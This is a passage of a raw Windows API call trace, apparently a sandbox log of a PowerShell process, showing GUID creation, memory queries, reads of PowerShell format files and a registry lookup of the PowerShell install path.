	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x8fe2776f, Data2=0xc9fb, Data3=0x44c4, Data4=([0]=0x8c, [1]=0x2e, [2]=0x36, [3]=0x75, [4]=0x58, [5]=0xa7, [6]=0x24, [7]=0x33))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xf703bc50, Data2=0x9c79, Data3=0x47e1, Data4=([0]=0xaf, [1]=0x68, [2]=0x93, [3]=0x4a, [4]=0xf6, [5]=0xd3, [6]=0x72, [7]=0xe7))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4726bf69, Data2=0xf327, Data3=0x43b1, Data4=([0]=0x87, [1]=0x3, [2]=0x56, [3]=0xda, [4]=0x91, [5]=0x1b, [6]=0x26, [7]=0xb9))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe86f2770, Data2=0x228, Data3=0x4925, Data4=([0]=0xaf, [1]=0xb9, [2]=0x86, [3]=0x6f, [4]=0x79, [5]=0x9c, [6]=0xdc, [7]=0xea))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6fea6eb2, Data2=0x37a0, Data3=0x425b, Data4=([0]=0x8a, [1]=0x12, [2]=0x5e, [3]=0xc, [4]=0x69, [5]=0x5b, [6]=0x56, [7]=0x30))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xd48036dc, Data2=0xaa39, Data3=0x412e, Data4=([0]=0x94, [1]=0xa7, [2]=0x53, [3]=0xe0, [4]=0x98, [5]=0x47, [6]=0xe9, [7]=0xf3))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xed9e955c, Data2=0x8b30, Data3=0x4b75, Data4=([0]=0xb0, [1]=0x53, [2]=0x10, [3]=0x91, [4]=0x7b, [5]=0xa6, [6]=0x8c, [7]=0x32))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4f65c653, Data2=0xa433, Data3=0x4e21, Data4=([0]=0x82, [1]=0xb1, [2]=0xac, [3]=0x5c, [4]=0xfb, [5]=0x1d, [6]=0xc8, [7]=0x99))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x20ff954d, Data2=0xa0eb, Data3=0x423b, Data4=([0]=0xa3, [1]=0x39, [2]=0xf6, [3]=0x3f, [4]=0xe5, [5]=0xee, [6]=0x1f, [7]=0xf9))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xa0c47558, Data2=0x10f0, Data3=0x4153, Data4=([0]=0xbc, [1]=0x76, [2]=0x2b, [3]=0x14, [4]=0x5a, [5]=0x5c, [6]=0x98, [7]=0x93))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe200f8f, Data2=0xa5c7, Data3=0x4bea, Data4=([0]=0xbf, [1]=0x23, [2]=0xd9, [3]=0x2, [4]=0xe2, [5]=0x6, [6]=0x15, [7]=0x88))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb8c1a890, Data2=0x7f85, Data3=0x42f0, Data4=([0]=0xb2, [1]=0x77, [2]=0x59, [3]=0xec, [4]=0xe, [5]=0xcc, [6]=0x5c, [7]=0xd8))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x41145184, Data2=0xea79, Data3=0x4851, Data4=([0]=0xb1, [1]=0xda, [2]=0x34, [3]=0xbd, [4]=0x56, [5]=0xf1, [6]=0x43, [7]=0x90))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x5bedf5be, Data2=0xee79, Data3=0x4744, Data4=([0]=0xb6, [1]=0x61, [2]=0xcf, [3]=0x47, [4]=0xa8, [5]=0x3e, [6]=0xf2, [7]=0xce))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3fa65ff8, Data2=0x8930, Data3=0x4e45, Data4=([0]=0xb0, [1]=0x5f, [2]=0x90, [3]=0x64, [4]=0x29, [5]=0x81, [6]=0xac, [7]=0xf6))) returned 0x0
	[0411.251] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb1ea980c, Data2=0xd483, Data3=0x4fc6, Data4=([0]=0x90, [1]=0xa7, [2]=0x28, [3]=0xca, [4]=0x83, [5]=0xca, [6]=0xea, [7]=0xc5))) returned 0x0
	[0411.251] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.251] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.251] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.252] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xf314ffa5, Data2=0x42ef, Data3=0x43bc, Data4=([0]=0xb3, [1]=0x48, [2]=0x2e, [3]=0x43, [4]=0xbd, [5]=0xa1, [6]=0xa7, [7]=0x42))) returned 0x0
	[0411.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.252] SetErrorMode (uMode=0x1) returned 0x1
	[0411.252] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.252] GetFileType (hFile=0x2fc) returned 0x1
	[0411.252] SetErrorMode (uMode=0x1) returned 0x1
	[0411.253] GetFileType (hFile=0x2fc) returned 0x1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.253] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.254] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x119, lpOverlapped=0x0) returned 1
	[0411.254] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fbf150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2fbf150*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0411.254] CloseHandle (hObject=0x2fc) returned 1
	[0411.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.254] SetErrorMode (uMode=0x1) returned 0x1
	[0411.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0411.254] SetErrorMode (uMode=0x1) returned 0x1
	[0411.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0411.255] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0411.255] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0411.255] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0411.255] CoTaskMemFree (pv=0x3ba940) 
	[0411.255] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.256] VirtualQuery (in: lpAddress=0x20bc80, lpBuffer=0x20cb40, dwLength=0x30 | out: lpBuffer=0x20cb40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xff7cd4f0, Data2=0x181b, Data3=0x48c8, Data4=([0]=0x98, [1]=0x7c, [2]=0xa3, [3]=0xf8, [4]=0x3b, [5]=0x7d, [6]=0x26, [7]=0x8e))) returned 0x0
	[0411.256] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xcea78117, Data2=0x436c, Data3=0x4d33, Data4=([0]=0x82, [1]=0xad, [2]=0xe3, [3]=0xe7, [4]=0xb0, [5]=0x83, [6]=0x98, [7]=0x1))) returned 0x0
	[0411.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3579c4b7, Data2=0x4246, Data3=0x4623, Data4=([0]=0xaf, [1]=0xa7, [2]=0x3d, [3]=0xbf, [4]=0x5c, [5]=0x95, [6]=0x28, [7]=0xd5))) returned 0x0
	[0411.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x85f88586, Data2=0x2611, Data3=0x403d, Data4=([0]=0xaf, [1]=0xe7, [2]=0xa8, [3]=0x9b, [4]=0x62, [5]=0x43, [6]=0xe, [7]=0x64))) returned 0x0
	[0411.257] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.257] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.257] SetErrorMode (uMode=0x1) returned 0x1
	[0411.257] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.257] GetFileType (hFile=0x2fc) returned 0x1
	[0411.257] SetErrorMode (uMode=0x1) returned 0x1
	[0411.257] GetFileType (hFile=0x2fc) returned 0x1
	[0411.257] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.258] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.259] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.259] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.260] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.261] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.262] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.262] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.262] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.262] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.263] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.264] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.266] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.266] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
